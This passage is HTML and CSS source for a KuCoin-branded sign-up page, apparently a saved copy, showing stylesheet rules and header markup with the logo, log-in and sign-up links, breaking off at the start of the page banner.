  }  body fieldset { min-width: initial; padding: initial; margin: initial; border: initial; margin-inline: 2px; padding-block: 0.35em 0.625em; padding-inline: 0.75em; }  body legend { width: initial; padding: initial; padding-inline: 2px; }  .css-atxi5g { position: relative; z-index: 100; width: 100%; }  .css-atxi5g .logo { vertical-align: middle; }  .css-1dftvkr { height: 0px; }  .css-n4rmn7 { position: fixed; top: 0px; left: 0px; right: 0px; z-index: 1000; background-color: rgb(255, 255, 255); transition: background-color 0.5s ease 0s; }  .css-1eazsyg { padding: 0px 32px; transition: all 0.3s ease 0s; }  @media (max-width: 1439px) {
    .css-1eazsyg { padding: 0px 24px; }
  }  @media (max-width: 767px) {
    .css-1eazsyg { padding: 0px 16px; }
  }  .css-6ljh47 { display: flex; position: relative; flex: 1 1 auto; margin: 0px auto; transition: all 0.3s ease 0s; width: 100%; height: 80px; -webkit-box-pack: justify; justify-content: space-between; }  @media (max-width: 1439px) {
    .css-6ljh47 { height: 64px; }
  }  .css-6qnjre { display: flex; -webkit-box-align: center; align-items: center; height: 100%; }  .css-1evik99 { display: flex; -webkit-box-align: center; align-items: center; }  .css-1evik99:hover { opacity: 0.8; }  .css-qoy9sy { width: 121px; height: 28px; transition: all 0.3s ease 0s; }  @media (max-width: 1439px) {
    .css-qoy9sy { width: 103.71px; height: 24px; }
  }  .css-1sg2lsz { display: flex; -webkit-box-align: center; align-items: center; }  .css-1qt7m5u { display: flex; -webkit-box-align: center; align-items: center; flex-direction: row; }  .css-1qt7m5u .navUserItem { color: rgb(29, 29, 29); cursor: pointer; padding: 0px; font-size: 14px; display: flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; width: auto; white-space: nowrap; text-decoration: none !important; background-clip: border-box !important; }  [dir="rtl"] .css-1qt7m5u .navUserItem { padding: 0px 0px 0px 12px; }  .css-1qt7m5u .navUserItem[data-menu="i18n"], .css-1qt7m5u .navUserItem[data-menu="currency"], .css-1qt7m5u .navUserItem[data-menu="download"], .css-1qt7m5u .navUserItem[data-menu="theme"] { display: flex; }  .css-1qt7m5u .navUserItem[data-menu="order"], .css-1qt7m5u .navUserItem[data-menu="asset"], .css-1qt7m5u .navUserItem[data-menu="person"] { display: flex; }  .css-1qt7m5u .navUserItem[data-menu="download"], .css-1qt7m5u .navUserItem[data-menu="i18n"], .css-1qt7m5u .navUserItem[data-menu="currency"], .css-1qt7m5u .navUserItem[data-menu="notice"], .css-1qt7m5u .navUserItem[data-menu="person"], .css-1qt7m5u .navUserItem[data-menu="order"] { padding: 0px; }  .css-1qt7m5u .navUserItem[data-menu="notice"] { margin-right: 12px; margin-left: 0px; }  .css-1qt7m5u .navUserItem[data-menu="person"], .css-1qt7m5u .navUserItem[data-menu="order"], .css-1qt7m5u .navUserItem[data-menu="notice"] { margin-left: 12px; }  [dir="rtl"] .css-1qt7m5u .navUserItem[data-menu="download"] { margin-right: 12px; }  [dir="rtl"] .css-1qt7m5u .navUserItem[data-menu="notice"] { margin: 0px; }  @media (max-width: 767px) {
    .css-1qt7m5u .navUserItem[data-menu="notice"] svg { width: 16px; height: 16px; }
  }  [dir="rtl"] .css-1qt7m5u .navUserItem[data-menu="person"] { margin-left: 0px; }  [dir="rtl"] .css-1qt7m5u .navUserItem[data-menu="theme"] { padding: 0px 12px 0px 0px; }  .css-1qt7m5u .navUserItem.signinLink { width: auto; margin-right: unset; }  @media screen and (max-width: 414px) {
    .css-1qt7m5u .navUserItem.signinLink { display: none; }
  }  .css-1qt7m5u .navUserItem.signinLink:hover { opacity: 0.6; }  .css-1qt7m5u .navUserItem.signinLink:active { opacity: 1; }  .css-1qt7m5u .navUserItem .signinBtn { width: unset; padding: 9px 24px; font-weight: 500; font-size: 14px; line-height: 130%; text-align: center; color: rgb(29, 29, 29); margin: 0px; transition: all 0.3s ease 0s; border: unset; border-radius: 24px; }  @media (max-width: 767px) {
    .css-1qt7m5u .navUserItem .signinBtn { font-size: 12px; }
  }  [dir="rtl"] .css-1qt7m5u .navUserItem .signinBtn { margin: 0px; }  .css-1qt7m5u .navUserItem.signUpLink { width: auto; }  .css-1qt7m5u .navUserItem.signUpLink:hover { opacity: 0.6; }  .css-1qt7m5u .navUserItem.signUpLink:active { opacity: 1; }  .css-1qt7m5u .navUserItem.signUpLink:active > img { display: block; }  .css-1qt7m5u .navUserItem .signUpBtn { width: unset; padding: 9px 28px; border-radius: 90px; font-weight: 700; font-size: 14px; line-height: 130%; text-align: center; color: rgb(255, 255, 255); background: rgb(29, 29, 29); position: relative; transition: all 0.3s ease 0s; }  @media (max-width: 767px) {
    .css-1qt7m5u .navUserItem .signUpBtn { padding: 8px 16px; font-size: 12px; }
  }  .css-9zi109 { display: flex; -webkit-box-align: center; align-items: center; margin-right: 0px; flex-direction: row; width: auto; padding: 0px; -webkit-box-pack: unset; justify-content: unset; }  .css-v71wna { width: 1px; height: 16px; margin: 0px 12px; }  [dir="rtl"] .css-v71wna { margin: 0px 12px 0px 0px; }  .css-15bj1sf { border: none; flex-shrink: 0; background: rgba(29, 29, 29, 0.08); display: block; width: 1px; height: 16px; margin: 0px 12px; }  [dir="rtl"] .css-15bj1sf { margin: 0px 12px 0px 0px; }  .css-1b9zzns { width: 40px; height: 40px; background: rgba(29, 29, 29, 0.04); border-radius: 50%; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; display: none; }  [dir="rtl"] .css-1b9zzns { margin-right: 12px; }  @media (max-width: 767px) {
    .css-1b9zzns { width: 32px; height: 32px; line-height: 30px; font-size: 14px; }
  }  .css-1b9zzns:hover svg { fill: rgb(1, 188, 141); }  .css-1n99kaq { max-width: 400px; width: 100%; height: 100vh; overflow: auto; background-color: rgb(255, 255, 255); padding: 0px !important; }  .css-1n99kaq .KuxDrawer-content::-webkit-scrollbar { width: 3px; height: 3px; }  .css-1n99kaq .KuxDrawer-content::-webkit-scrollbar-thumb { border-radius: 2px; background: rgba(29, 29, 29, 0.08); }  .css-1n99kaq .showDownBox { padding: 0px 24px; }  .css-1n99kaq .userBox { margin: 0px; }  .css-lmssxu { max-width: 400px; width: 100%; }  .css-lmssxu .KuxDrawer-content { }  .css-lmssxu .KuxDrawer-content::-webkit-scrollbar { display: none; }  .css-1iv9pmj { height: 81px; }  .css-1lm9f0d { display: flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; width: 40px; height: 40px; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-color: rgba(29, 29, 29, 0.04); border-radius: 20px; margin-left: 12px; background-clip: padding-box !important; }  [dir="rtl"] .css-1lm9f0d { margin-left: 0px; margin-right: 12px; }  .css-1lm9f0d svg { color: rgb(29, 29, 29); }  .css-1lm9f0d span { color: rgb(29, 29, 29); font-weight: 600; font-size: 14px; }  .css-1lm9f0d:hover svg, .css-1lm9f0d:hover span { color: rgb(1, 188, 141); }  .css-14yu18w .KuxModalHeader-root .KuxModalHeader-close { top: 24px !important; }  .css-14yu18w .KuxDialog-content { padding: 0px; border-radius: 0px 0px 20px 20px; }  .css-162y68p { height: 80px; }  .css-1dz931i { width: 100%; height: 100%; display: flex; flex-direction: column; background: rgb(255, 255, 255); }  .css-1dz931i .banner { flex: 0 0 45%; }  .css-gfyiy3 { display: flex; flex-flow: row wrap; -webkit-box-pack: start; justify-content: flex-start; align-items: flex-start; }  .css-gfyiy3::before, .css-gfyiy3::after { display: flex; }  .css-139vhbh { position: relative; min-height: 1px; display: block; flex: 0 0 45.8333%; max-width: 45.8333%; }  .css-c0ajov { box-sizing: border-box; min-height: 0px; min-width: 0px; display: flex; height: 100%; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; position: relative; }  .css-qrlrtm { box-sizing: border-box; min-height: 0px; min-width: 0px; width: 100%; position: absolute; bottom: 0px; }  .css-fm3kvj { position: absolute; inset: 0px; z-index: 0; display: flex; }  .css-14d5rtx { flex: 1 1 55%; height: 100%; object-fit: cover; overflow: hidden; }  .css-ts3x3g { position: relative; min-height: 1px; display: block; }  .css-mpa8nz { box-sizing: border-box; min-height: 0px; min-width: 0px; display: flex; height: 100%; width: 100%; align-items: flex-start; -webkit-box-pack: start; justify-content: flex-start; position: relative; }  .css-1rsyla4 { position: relative; margin-top: 100px; margin-bottom: 100px; flex: 1 1 0%; width: 100%; }  @media (max-width:NaNpx) {
    .css-1rsyla4 { margin-top: 40px; margin-bottom: 40px; }
  }  @media (max-width: 767px) {
    .css-1rsyla4 { padding: 0px 16px; margin-top: 40px; margin-bottom: 40px; }
  }  .css-5kgvnz { box-sizing: border-box; min-height: 0px; min-width: 0px; position: relative; margin-top: 100px; margin-bottom: 100px; flex: 1 1 0%; width: 100%; }  @media (max-width:NaNpx) {
    .css-5kgvnz { margin-top: 40px; margin-bottom: 40px; }
  }  @media (max-width: 767px) {
    .css-5kgvnz { padding: 0px 16px; margin-top: 40px; margin-bottom: 40px; }
  }  .css-mpirg9 { box-sizing: border-box; min-height: 0px; min-width: 0px; }  .css-uuchwj { width: 100%; max-width: 486px; margin: 0px auto 0px 100px; padding: unset; }  @media (max-width: 1439px) {
    .css-uuchwj { margin: 0px auto; }
  }  @media (max-width: 1199px) {
    .css-uuchwj { margin: 0px auto; padding: unset; }
  }  @media (max-width: 767px) {
    .css-uuchwj { width: 100%; margin: 0px auto; max-width: unset; padding: unset; }
  }  .css-b38fps { box-sizing: border-box; min-height: 0px; min-width: 0px; width: 100%; max-width: 486px; margin: 0px auto 0px 100px; padding: unset; }  @media (max-width: 1439px) {
    .css-b38fps { margin: 0px auto; }
  }  @media (max-width: 1199px) {
    .css-b38fps { margin: 0px auto; padding: unset; }
  }  @media (max-width: 767px) {
    .css-b38fps { width: 100%; margin: 0px auto; max-width: unset; padding: unset; }
  }  .css-1b12qyh { box-sizing: border-box; min-height: 0px; min-width: 0px; width: 100%; position: absolute; bottom: 0px; right: 0px; }  .css-wcpi88 .__AnimateOverlay__ { animation-duration: 0.23s; animation-name: animation-v15rbp; animation-fill-mode: forwards; }  @-webkit-keyframes animation-v15rbp { 
    0% { opacity: 1; transform: translateY(0px); }
    100% { opacity: 0; transform: translateY(8px); }
  }  @keyframes animation-v15rbp { 
    0% { opacity: 1; transform: translateY(0px); }
    100% { opacity: 0; transform: translateY(8px); }
  }  .css-1a3v9iz { display: inline-flex; }  .css-1a3v9iz .__AnimateOverlay__ { animation-duration: 0.23s; animation-name: animation-v15rbp; animation-fill-mode: forwards; }  .css-5xkyj6 { display: flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; width: 40px; height: 40px; background: rgba(29, 29, 29, 0.04); border-radius: 50%; }  .css-5xkyj6 svg { margin: 0px 6px; }  .css-5xkyj6 img { width: 16px; }  .css-5xkyj6:hover svg { fill: rgb(1, 188, 141); }  .css-mr93o9 { box-sizing: border-box; min-height: 0px; min-width: 0px; height: 100%; display: flex; flex-direction: column; }</style>
  <style id="jss-insertion-point"></style>
  <style>
    .css-mpa8nz {
  box-sizing: border-box;
  min-height: 0px;
  min-width: 0px;
  display: flex;
  height: 100%;
  width: 100%;
  align-items: flex-start;
  -moz-box-pack: start;
  justify-content: flex-start;
  position: relative;
}

.css-5kgvnz {
  box-sizing: border-box;
  min-height: 0px;
  min-width: 0px;
  position: relative;
  margin-top: 100px;
  margin-bottom: 100px;
  flex: 1 1 0%;
  width: 100%;
}

@media (max-width: 767px) {
  .css-5kgvnz {
    padding: 0px 16px;
    margin-top: 40px;
    margin-bottom: 40px;
  }
}

.css-mpirg9 {
  box-sizing: border-box;
  min-height: 0px;
  min-width: 0px;
}

@media (max-width: 1439px) {
  .css-b38fps {
    margin: 0px auto;
  }
}
.css-b38fps {
  box-sizing: border-box;
  min-height: 0px;
  min-width: 0px;
  width: 100%;
  max-width: 486px;
  margin: 0px auto 0px 100px;
  padding: unset;
}

.css-1280167 {
  position: relative;
  display: block;
  align-self: baseline;
}

.css-1skih21 {
  position: relative;
  clear: both;
}

.css-1lha2kr {
  box-sizing: border-box;
  min-height: 0px;
  min-width: 0px;
  display: flex;
  height: 100%;
  flex-direction: column;
}

.css-1s1a632 {
  box-sizing: border-box;
  min-height: 0px;
  min-width: 0px;
  flex: 1 1 0%;
}

.css-si8vkb {
  box-sizing: border-box;
  min-height: 0px;
  min-width: 0px;
  margin-bottom: 40px;
  margin-top: 0px;
  display: flex;
}

.css-mr4dhk {
  font-weight: 700;
  font-size: 40px;
  line-height: 130%;
  margin-top: 0px;
  color: rgb(29, 29, 29);
  margin-bottom: 16px;
  word-break: break-word;
}

@media (max-width: 767px) {
  .css-mr4dhk {
    font-size: 24px;
    margin-bottom: 8px;
  }
}

.css-1ule816 {
  box-sizing: border-box;
  min-height: 0px;
  min-width: 0px;
  font-weight: 400;
  font-size: 16px;
  line-height: 130%;
  color: rgba(29, 29, 29, 0.6);
  margin-bottom: 40px;
}

.css-9mv970 {
  box-sizing: border-box;
  margin: 0px;
  padding: 0px;
  list-style: none;
}

.css-1uqn2oy {
  display: flex;
  flex-flow: column wrap;
  -moz-box-pack: start;
  justify-content: flex-start;
  align-items: flex-start;
}

.css-1dbp2j {
  position: relative;
  min-height: 1px;
  display: flex;
  flex-direction: column;
  width: 100%;
}

.css-161mx9n {
  box-sizing: border-box;
  min-height: 0px;
  min-width: 0px;
  display: flex;
  align-items: flex-end;
  flex-direction: column;
}

.css-xl471x {
  box-sizing: border-box;
  min-height: 0px;
  min-width: 0px;
}

.css-1azhzmu {
  width: 100%;
  display: flex;
  -moz-box-align: center;
  align-items: center;
  -moz-box-pack: justify;
  justify-content: space-between;
}

.css-8g6s6x {
  position: relative;
  font-family: "Roboto", "PingFang SC", -apple-system, BlinkMacSystemFont, "Microsoft YaHei";
  background: transparent;
    background-clip: border-box;
  outline: none;
  width: 100%;
  height: fit-content;
  box-sizing: border-box;
  border-radius: 8px;
  display: flex;
  flex-direction: row;
  -moz-box-align: center;
  align-items: center;
  opacity: 1;
  cursor: text;
  padding: 0px 16px 0px 12px;
}

.css-1azhzmu .ipt_pwd {
  width: 64px;
  height: 72px;
  padding: 0px;
  text-align: center;
}

@media (max-width: 767px) {
  .css-1azhzmu .ipt_pwd {
    width: 48px;
    height: 54px;
    font-size: 24px;
  }
}

.css-1azhzmu .ipt_pwd .KuxInput-input {
  width: 100%;
  height: 100%;
  text-align: center;
  line-height: 1;
  font-size: 28px;
}
.css-1a7r0qu {
  border: medium;
  outline: none;
  padding: 0px;
  width: 100%;
  flex: 1 1 0%;
  margin: 0px;
  box-sizing: border-box;
  background: transparent;
  font-family: "Roboto", "PingFang SC", -apple-system, BlinkMacSystemFont, "Microsoft YaHei";
  color: rgb(29, 29, 29);
  cursor: text;
  font-weight: 500;
  font-size: 14px;
  height: 40px;
  line-height: 22px;
}

.css-i8mafz {
  display: inline-flex;
  flex-shrink: 0;
  -moz-box-pack: center;
  justify-content: center;
  -moz-box-align: center;
  align-items: center;
  box-sizing: border-box;
  border-radius: 24px;
  outline: none;
  cursor: pointer;
  width: auto;
  opacity: 1;
  pointer-events: auto;
  font-family: "Roboto", "PingFang SC", -apple-system, BlinkMacSystemFont, "Microsoft YaHei";
  font-weight: 700;
  font-size: 16px;
  padding: 0px;
  border: medium;
  background: transparent;
  color: rgb(29, 29, 29);
  height: auto;
  margin-top: 16px !important;
}

@media only screen and (max-width: 600px) {
  .css-b38fps {
    box-sizing: border-box;
    min-height: 0px;
    min-width: 0px;
    width: 100%;
    max-width: 486px;
    margin: 0px auto 0px auto;
    padding: unset;
  }
}
  </style>

  </head>

  <body>

    <style>

        .banner {
          display: block;
        }

      @media only screen and (max-width: 600px) {
        .banner {
          display: none;
        }
      }
    </style>

    <noscript>You need to enable JavaScript to run this app.</noscript>
    <div id="root">
      <div class="__analytics-module">
        <div class="root root_QCGGy css-76ygvu e1rzxqrx0" data-path="/ucenter/signup">
          <div class="body_hXuuO onlymain_Beuhw">
            <div class="css-1dn57jc e1l0el2c0">

              <div class="gbiz-Header css-atxi5g">
                <div data-class="headerRoomWrapper" class="css-162y68p">
                  <div class="gbiz-headeroom css-n4rmn7">
                    <div class="Header-Nav css-1eazsyg">
                      <div class="css-6ljh47">
                        <div id="hook_nav_links" class="css-6qnjre">
                          <div class="css-6qnjre">
                            <a href="index" aria-label="Kucoin logo (header)" class="css-1evik99">
                              <img src="data:image/svg+xml,%3Csvg%20width%3D%22122%22%20height%3D%2229%22%20viewBox%3D%220%200%20122%2029%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cpath%20d%3D%22M95.985%2014.9845C95.985%2014.2555%2095.985%2013.5805%2095.958%2012.9594C95.931%2012.3384%2095.877%2011.7444%2095.796%2011.2314C95.715%2010.6914%2095.553%2010.2053%2095.31%209.71932C95.094%209.2333%2094.7429%208.80128%2094.3379%208.36927C93.7439%207.77525%2093.0959%207.34323%2092.3669%207.01922C91.6378%206.72221%2090.8008%206.5332%2089.8558%206.5332C88.9107%206.5332%2088.0737%206.69521%2087.3447%207.01922C86.6157%207.31623%2085.9406%207.77525%2085.3466%208.36927C84.9146%208.80128%2084.6176%209.2333%2084.4016%209.71932C84.1856%2010.2053%2083.9966%2010.6914%2083.9156%2011.2314C83.8346%2011.7714%2083.7806%2012.3384%2083.7536%2012.9594C83.7266%2013.5805%2083.7266%2014.2555%2083.7266%2014.9845C83.7266%2015.7135%2083.7266%2016.3616%2083.7536%2017.0096C83.7806%2017.6306%2083.8346%2018.2246%2083.9156%2018.7376C83.9966%2019.2777%2084.1586%2019.7637%2084.4016%2020.2497C84.6176%2020.7357%2084.9686%2021.1677%2085.3466%2021.5997C85.9406%2022.1938%2086.5887%2022.6258%2087.3447%2022.9498C88.0737%2023.2468%2088.9107%2023.4358%2089.8558%2023.4358C90.8008%2023.4358%2091.6108%2023.2738%2092.3669%2022.9498C93.0959%2022.6528%2093.7709%2022.1938%2094.3379%2021.5997C94.7699%2021.1677%2095.0669%2020.7357%2095.31%2020.2497C95.526%2019.7637%2095.715%2019.2777%2095.796%2018.7376C95.877%2018.1976%2095.958%2017.6306%2095.958%2017.0096C95.985%2016.3346%2095.985%2015.7135%2095.985%2014.9845ZM92.7719%2014.9845C92.7719%2015.7675%2092.7719%2016.4426%2092.7449%2016.9826C92.7179%2017.5226%2092.6909%2017.9276%2092.6099%2018.2786C92.5559%2018.6026%2092.4749%2018.8996%2092.3669%2019.0887C92.2589%2019.3047%2092.1509%2019.5207%2091.9619%2019.6827C91.7458%2019.9527%2091.4218%2020.1687%2091.0978%2020.3307C90.7468%2020.4927%2090.3418%2020.5467%2089.8828%2020.5737C89.4238%2020.5737%2089.0457%2020.4927%2088.6677%2020.3307C88.3167%2020.1687%2088.0197%2019.9797%2087.7767%2019.6827C87.6147%2019.5207%2087.5067%2019.3317%2087.3717%2019.0887C87.2637%2018.8726%2087.1827%2018.6026%2087.1287%2018.2786C87.0747%2017.9546%2087.0207%2017.5226%2087.0207%2016.9826C86.9937%2016.4426%2086.9937%2015.7945%2086.9937%2014.9845C86.9937%2014.2015%2086.9937%2013.5265%2087.0207%2012.9864C87.0477%2012.4464%2087.0747%2012.0414%2087.1287%2011.6904C87.1827%2011.3394%2087.2637%2011.0694%2087.3717%2010.8804C87.4797%2010.6644%2087.5877%2010.4483%2087.7767%2010.2863C87.9927%2010.0163%2088.3167%209.80032%2088.6677%209.63831C89.0187%209.47631%2089.4238%209.42231%2089.8828%209.39531C90.3418%209.39531%2090.7198%209.47631%2091.0978%209.63831C91.4218%209.80032%2091.7458%209.98933%2091.9619%2010.2863C92.1239%2010.4483%2092.2319%2010.6374%2092.3669%2010.8804C92.4749%2011.0964%2092.5559%2011.3664%2092.6099%2011.6904C92.6639%2012.0144%2092.7179%2012.4464%2092.7449%2012.9864C92.7449%2013.5265%2092.7719%2014.2015%2092.7719%2014.9845Z%22%20fill%3D%22%2301BC8D%22%2F%3E%3Cpath%20d%3D%22M121.772%206.96532C121.772%206.80332%20121.637%206.69531%20121.502%206.69531H118.855C118.693%206.69531%20118.585%206.83032%20118.585%206.96532V16.8477L112.078%206.77632C112.024%206.72231%20111.997%206.69531%20111.916%206.69531H109.432C109.297%206.69531%20109.162%206.83032%20109.162%206.96532C109.162%2012.3115%20109.162%2017.6577%20109.162%2022.9499C109.162%2023.1119%20109.297%2023.2199%20109.432%2023.2199H112.078C112.24%2023.2199%20112.348%2023.0849%20112.348%2022.9499V13.0405L118.855%2023.1389C118.909%2023.1929%20118.936%2023.2199%20119.017%2023.2199H121.502C121.664%2023.2199%20121.772%2023.0849%20121.772%2022.9499V6.96532Z%22%20fill%3D%22%2301BC8D%22%2F%3E%3Cpath%20d%3D%22M103.87%206.96532C103.87%206.80332%20103.735%206.69531%20103.6%206.69531H100.954C100.792%206.69531%20100.684%206.83032%20100.684%206.96532V22.9499C100.684%2023.1119%20100.819%2023.2199%20100.954%2023.2199H103.6C103.762%2023.2199%20103.87%2023.0849%20103.87%2022.9499V6.96532Z%22%20fill%3D%22%2301BC8D%22%2F%3E%3Cpath%20d%3D%22M71.9546%2014.9845C71.9546%2014.2015%2071.9546%2013.5265%2071.9816%2012.9864C72.0086%2012.4464%2072.0356%2012.0414%2072.0896%2011.6904C72.3326%2010.2593%2073.4397%209.42231%2074.8437%209.42231C75.7617%209.42231%2076.5718%209.74632%2077.1118%2010.5293C77.3278%2010.8534%2077.5168%2011.2584%2077.6248%2011.7174C77.6248%2011.7714%2077.6518%2011.7984%2077.7058%2011.7984H80.8379C80.8919%2011.7984%2080.8919%2011.7714%2080.8919%2011.7174C80.5679%209.80032%2079.5149%208.01826%2077.6788%207.15423C76.8418%206.74921%2075.8697%206.5332%2074.7897%206.5332C73.0346%206.5332%2071.5226%207.15423%2070.3076%208.34227C69.6055%209.0443%2069.1735%209.88132%2068.9575%2010.8264C68.7685%2011.7444%2068.6875%2013.1214%2068.6875%2014.9305C68.6875%2016.7396%2068.7685%2018.1166%2068.9575%2019.0346C69.1465%2019.9797%2069.6325%2020.8167%2070.3076%2021.5187C71.5226%2022.7338%2073.0076%2023.3278%2074.7897%2023.3278C75.8427%2023.3278%2076.8148%2023.1388%2077.6788%2022.7068C79.4879%2021.8428%2080.5679%2020.1147%2080.8919%2018.1436C80.8919%2018.0896%2080.8919%2018.0626%2080.8379%2018.0626H77.7058C77.6518%2018.0626%2077.6248%2018.0896%2077.6248%2018.1436C77.5168%2018.6026%2077.3548%2018.9806%2077.1118%2019.3317C76.5718%2020.0877%2075.7617%2020.4117%2074.8437%2020.4387C73.4397%2020.4387%2072.3596%2019.6017%2072.0896%2018.1706C72.0356%2017.8466%2071.9816%2017.4146%2071.9816%2016.8746C71.9546%2016.4426%2071.9546%2015.7675%2071.9546%2014.9845Z%22%20fill%3D%22%2301BC8D%22%2F%3E%3Cpath%20d%3D%22M38.7974%206.96532C38.7974%206.80332%2038.6624%206.69531%2038.5274%206.69531H35.8813C35.7193%206.69531%2035.6113%206.83032%2035.6113%206.96532V22.9499C35.6113%2023.1119%2035.7463%2023.2199%2035.8813%2023.2199H38.5274C38.6894%2023.2199%2038.7974%2023.0849%2038.7974%2022.9499V18.2517L40.9575%2015.6866L45.3587%2023.1659C45.3857%2023.2199%2045.4397%2023.2469%2045.5207%2023.2469H48.7608C48.8958%2023.2469%2048.9228%2023.1659%2048.8688%2023.0309L43.1176%2013.2835L48.4098%206.93832C48.5178%206.80331%2048.4638%206.69531%2048.3018%206.69531H44.7376C44.6836%206.69531%2044.6566%206.69531%2044.6296%206.74931L38.7974%2013.6886V6.96532Z%22%20fill%3D%22%2301BC8D%22%2F%3E%3Cpath%20d%3D%22M58.2377%2020.5197C56.7256%2020.5197%2055.3756%2019.1156%2055.3756%2017.4685V6.99218C55.3756%206.83017%2055.2406%206.72217%2055.1055%206.72217H52.4595C52.2975%206.72217%2052.1895%206.85717%2052.1895%206.99218V17.4415C52.1895%2021.1137%2054.9435%2023.4358%2058.2917%2023.4358C61.6398%2023.4358%2064.3939%2021.1137%2064.3939%2017.4415V6.99218C64.3939%206.83017%2064.2589%206.72217%2064.1239%206.72217H61.4778C61.3158%206.72217%2061.2078%206.85717%2061.2078%206.99218V17.4685C61.0728%2019.1156%2059.7227%2020.5197%2058.2377%2020.5197Z%22%20fill%3D%22%2301BC8D%22%2F%3E%3Cpath%20d%3D%22M8.71879%2014.9844L17.0081%2023.2737L22.2462%2018.0355C23.1643%2017.1175%2024.6763%2017.1175%2025.5944%2018.0355C26.5124%2018.9535%2026.5124%2020.4656%2025.5944%2021.3836L18.6821%2028.2959C17.7641%2029.2139%2016.252%2029.2139%2015.334%2028.2959L5.39767%2018.3325V24.2727C5.39767%2025.5688%204.34464%2026.6488%203.02159%2026.6488C1.69854%2026.6488%200.645508%2025.5958%200.645508%2024.2727V5.75005C0.645508%204.427%201.69854%203.37396%203.02159%203.37396C4.34464%203.37396%205.39767%204.427%205.39767%205.75005V11.6363L15.361%201.6729C16.279%200.754867%2017.7911%200.754867%2018.7091%201.6729L25.6214%208.58515C26.5394%209.50318%2026.5394%2011.0152%2025.6214%2011.9333C24.7033%2012.8513%2023.1913%2012.8513%2022.2733%2011.9333L17.0351%206.69508L8.71879%2014.9844ZM17.0351%2012.6083C15.712%2012.6083%2014.659%2013.6613%2014.659%2014.9844C14.659%2016.3074%2015.712%2017.3605%2017.0351%2017.3605C18.3581%2017.3605%2019.4111%2016.3074%2019.4111%2014.9844C19.3841%2013.6613%2018.3311%2012.6083%2017.0351%2012.6083Z%22%20fill%3D%22%2301BC8D%22%2F%3E%3C%2Fsvg%3E" alt="KuCoin" class="css-qoy9sy">
                            </a>
                          </div>
                        </div>
      
      
                        <div id="hook_nav_user" data-status="0" class="css-1sg2lsz">
                          <div class="css-1qt7m5u">
                            <div id="unLoginBox" data-lang="en_US" class="css-9zi109" style="display: flex;">
                              <a href="index" class="navUserItem signinLink" data-modid="login">
                                <div class="signinBtn">Log In</div>
                              </a>
                              <a href="#" class="navUserItem signUpLink">
                                <div class="signUpBtn" data-modid="register">Sign Up</div>
                              </a>
                              <div type="horizontal" class="KuxDivider-root KuxDivider-center KuxDivider-horizontal css-15bj1sf" style="display: block;"></div>
                            </div>
                            <div class="navUserItem" data-lang="en_US" data-menu="download">
                              <div class="KuxDropDown-container css-1a3v9iz">
                                <div class="KuxDropDown-trigger" style="display: block;">
                                  <div class="css-5xkyj6">
                                    <svg class="navIcon" viewbox="0 0 1024 1024" xmlns="http://www.w3.org/2000/svg" width="20" height="20" fill="#1D1D1D"><path d="M170.656 256A85.344 85.344 0 01256 170.656h42.656a42.656 42.656 0 000-85.312H256A170.656 170.656 0 0085.344 256v554.656A170.656 170.656 0 00256 981.312h512a170.656 170.656 0 00170.656-170.656V256A170.656 170.656 0 00768 85.344h-48.064a42.656 42.656 0 000 85.312H768A85.344 85.344 0 01853.344 256v554.656A85.344 85.344 0 01768 896H256a85.344 85.344 0 01-85.344-85.344V256zM511.84 85.344c23.552 0 42.656 19.104 42.656 42.656v494.496l119.328-119.328a42.656 42.656 0 1160.352 60.352l-192 192a42.624 42.624 0 01-30.272 12.512h-.096a42.56 42.56 0 01-32.352-14.848L289.824 563.552a42.656 42.656 0 1160.352-60.352l119.008 119.008V128.064c0-23.552 19.104-42.656 42.656-42.656z"></path></svg>
                                  </div>
                                </div>
                              </div>
                            </div>
                            <div class="navUserItem" data-lang="en_US" data-menu="i18n">
                              <div class="css-1lm9f0d">
                                <svg class="navIcon" viewbox="0 0 1024 1024" xmlns="http://www.w3.org/2000/svg" width="20" height="20" fill="currentColor"><path d="M512 981.344C252.8 981.344 42.656 771.232 42.656 512S252.768 42.656 512 42.656c259.2 0 469.344 210.112 469.344 469.344S771.232 981.344 512 981.344zM407.264 880.096c-46.304-98.208-68.192-216.416-74.048-324.832H128c9.12 72.224 44.576 149.728 91.648 205.248S337.536 859.2 407.264 880.096zm12.288-324.864C426.624 669.696 459.36 780.928 512 875.808c54.08-97.408 85.664-209.376 92.448-320.576H419.52zm475.264 0H689.664c-5.856 108.416-26.464 226.624-72.768 324.832 69.728-20.896 140.672-64.032 187.744-119.584s81.056-133.024 90.176-205.248zm-766.848-86.816h205.248c5.856-108.416 27.776-226.08 74.08-324.32-69.728 20.864-140.608 63.712-187.648 119.264s-82.56 132.832-91.68 205.056zm291.584 0h184.832c-6.784-111.2-38.304-222.848-92.352-320.256-54.08 97.408-85.728 209.056-92.512 320.256h.032zm197.376-324.288c46.304 98.208 66.848 215.872 72.704 324.32h205.152c-9.12-72.224-43.072-149.792-90.144-205.344s-117.984-98.08-187.744-118.976z"></path></svg>
                              </div>
                            </div>
                          </div>
                          <div data-lang="en_US" class="MenuBox css-1b9zzns">
                            <svg class="ICMenu_svg__icon" viewbox="0 0 1024 1024" xmlns="http://www.w3.org/2000/svg" width="20" height="20" fill="#1D1D1D" style="cursor: pointer;"><path d="M153.6 256a51.2 51.2 0 0151.2-51.2h614.4a51.2 51.2 0 110 102.4H204.8a51.2 51.2 0 01-51.2-51.2zm0 256a51.2 51.2 0 0151.2-51.2H512a51.2 51.2 0 110 102.4H204.8a51.2 51.2 0 01-51.2-51.2zm0 256a51.2 51.2 0 0151.2-51.2h614.4a51.2 51.2 0 110 102.4H204.8a51.2 51.2 0 01-51.2-51.2z"></path></svg>
                          </div>
                        </div>

                      </div>
                    </div>
                  </div>
                </div>
              </div>

              <div class="css-h96opg essyzlb0">
                <div class="KuxBox-root css-1erus7g">
                  <div class="css-rvip7g">
                    <section class="css-1dz931i">
                      <div class="KuxRow-row css-gfyiy3" style="flex: 1 1 0%; row-gap: 0px;">
                        <div span="11" order="0" offset="0" class="banner KuxCol-col KuxCol-11-col css-139vhbh" style="position: relative; height: 100%;">
